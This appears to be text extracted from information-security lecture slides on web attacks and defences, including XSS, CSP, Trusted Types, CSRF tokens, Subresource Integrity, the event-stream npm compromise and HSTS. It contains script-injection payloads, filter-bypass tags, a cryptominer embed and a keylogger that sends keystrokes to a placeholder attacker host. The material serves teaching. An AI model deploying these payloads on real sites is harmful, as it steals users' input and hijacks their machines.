Masters in Information Security
OWASP Top 10
Most occurred
Post Data with malicious code
Store
Fetch
Open App
Get malicious code
Check
Request with payload
Page with payload
Request unrelated page
Page with malicious code
.../search.php?q=something<script>alert(1)</script>...
...<h1>Search for something<script>alert(1)</script>...
Follow link
Response
Make user to follow a link
var url = new URL(location.gref).searchParams.get("user");
$('#form').append('<input type="hidden" value="' + url + '">');
<form id="#form">
<input type="hidden"
value="https://example.com"/><script>alert(1)</script>
</form>
.../?user=something<script>alert(1)</script>...
var keys='';
document.onkeypress = function(e) {
e = window.event?event:e;
key = e.keyCode?e.keyCode:e.charCode;
key = String.fromCharCode(key);
keys+=key;
}
window.setInterval(function(){
new Image().src = 'http://evil.../log.php?c='+keys;
keys = '';
}, 1000);
<script src="https://coinhive.com/lib/coinhive.min.js">
</script>
<script>
var miner = new CoinHive.User('SITE_KEY', 'john-doe');
miner.start();
</script>
$save_text = str_replace('script', 'span', $text);
<ScRiPt>/* bad code here*/ </ScRiPt>
<input type="image" src="javascript:/* ... */;">
<img src="no.png" onerror="/* bad code here */">
Inline code
API
CDN
Analytics
3rd party
Injected script
Content-Security-Policy-Report-Only:
default-src https: 'unsafe-inline' 'unsafe-eval';
report-uri https://csp-violation-report-endpoint/
$('#form').append('...some STRING');
el.innerHTML='...some STRING'
el.innerHTML = { toString: () => 'hello' }
el.innerHTML // "hello"
Content-Security-Policy: trusted-types myPolicy
el.innerHTML = location.hash.slice(1); //string
//create via a TrustedTypes policy
el.innerHTML = aTrustedHTML;
Content-Security-Policy: trusted-types *
login
action
bad action
done
done!
eBay : The password cannot be updated by using this method.
: However, the information that’s needed to reset the password can.
login
action
bad action
done
Token:
==
Token: ...
NO ACCESS!
!= ...
https:// .../1.8/jquery.js
CDN
modified jquery.js*
<script src="http://.../1.8/jquery.js"
integrity="sha384-DegqqxuZuCnJ...38EidfneOW/An5kgufFFTa"
crossorigin="anonymous">
</script>
<script src="http://.../1.8/jquery.js"
integrity="sha384-DegqqxuZuCnJ...38EidfneOW/An5kgufFFTa">
</script>
<script src="http://.../1.8/jquery.js">
</script>
sha(jquery.js) != sha(jquery.js*)
event-stream v3.3.6
right9ctrl
event-stream v4.0.0
flatmap-stream v0.1.1
flatmap-stream v0.1.0
event-stream v3.3.5
flatmap-stream v0.1.1
require("crypto").decrypt("aes256", data, npm_package_description);
copay-dash
if(!/build\:.*\-release/.test(process.arg[2])) return;
npm run-script command
"build:ios-release": "run-s env:prod && ionic cordova build ios --release"
inject malicious payload to steal private keys from wallet
flatmap-stream v0.1.1
event-stream
npm audit
request HTTP page
redirect to HTTPS
request HTTPS page
HTTPS response
95% of HTTPS servers vulnerable to trivial MITM attack
request HTTP page
redirect to HTTPS
request HTTPS page
HTTPS response
request HTTP page
HTTP response
HTTPS → HTTP
login
steal
credentials
login HTTPS
HTTPS response
HTTP response
request HTTP page
redirect to HTTPS
request HTTPS page
HTTPS response
with Strict-transport-security header
another day
user requests HTTP page